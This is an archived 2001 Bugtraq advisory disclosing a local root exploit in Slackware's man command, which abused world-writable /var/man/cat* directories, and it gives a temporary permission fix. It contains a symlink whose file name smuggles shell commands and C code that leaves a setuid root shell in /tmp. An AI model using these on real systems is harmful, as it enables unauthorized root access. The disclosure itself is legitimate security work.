6759588 2001-07-17 08:34 -0500 /75 rader/ <josh@pulltheplug.com> Sänt av: joel@lysator.liu.se Importerad: 2001-07-17 18:52 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18037> Ärende: Slackware /usr/bin/man vulnerability ------------------------------------------------------------ From: <josh@pulltheplug.com> To: <bugtraq@securityfocus.com> Message-ID: <Pine.LNX.4.33.0107170825320.25427-100000@shell.pulltheplug.com> The following advisory was sent to slackware July 11th, 2001, they failed to respond so I hope the temporary patch will make do: Submitted by : Josh (josh@pulltheplug.com), lockdown (lockdown@lockeddown.net) zen-parse (zen-parse@gmx.net) Vulnerability : /usr/bin/man Tested On : Slackware 8.0 and before. Local : Yes Remote : No Temporary Fix : chmod 700 /var/man/cat* Target : root or any other user that uses man Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it, slider, cryptix, s0ttle, xphantom, qtip, Sultrix, Defiance, Insane, rusko, falcon-networks.com. See also : http://www.securityfocus.com/vdb/?id=2815 Slackware 8.0 and previous issues of Slackware are released with /var/man/cat*/ chmod 1777: drwxrwxrwt 2 root root 4096 Jul 11 11:03 cat*/ Since these directories are world writeable we can create symlinks there like so: `ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=. ;script;man.7" /var/man/cat7/man.7.gz` When `/usr/bin/man man` is executed by root, it will create /var/man/cat7/man.1.gz. The symlink forces it to create a file in /usr/man/man7 named: "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;exportPATH=.; script;man.7.gz." /usr/bin/man will then execute /tmp/script which contains: #include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/wait.h> #include <errno.h> int main() { FILE *fil; mode_t perm = 06711; if(!getuid()) { fil = fopen("/tmp/bleh.c","w"); fprintf(fil,"%s\n","#include <unistd.h>"); fprintf(fil,"%s\n","#include <stdio.h>"); fprintf(fil,"%s\n","int main() {"); fprintf(fil,"%s\n","setreuid(0,0);setregid(0,0);"); fprintf(fil,"%s\n","execl(\"/bin/su\",\"su\",NULL);"); fprintf(fil,"%s\n","return 0; }"); fclose(fil); system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c"); unlink("/tmp/bleh.c"); chmod("/tmp/bleh", perm); } execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL); return 0; } With the above code compiled in /tmp/script, if root were to run `man man`, a suid shell would be left in /tmp/bleh. (6759588) / <josh@pulltheplug.com>/-------(Ombruten)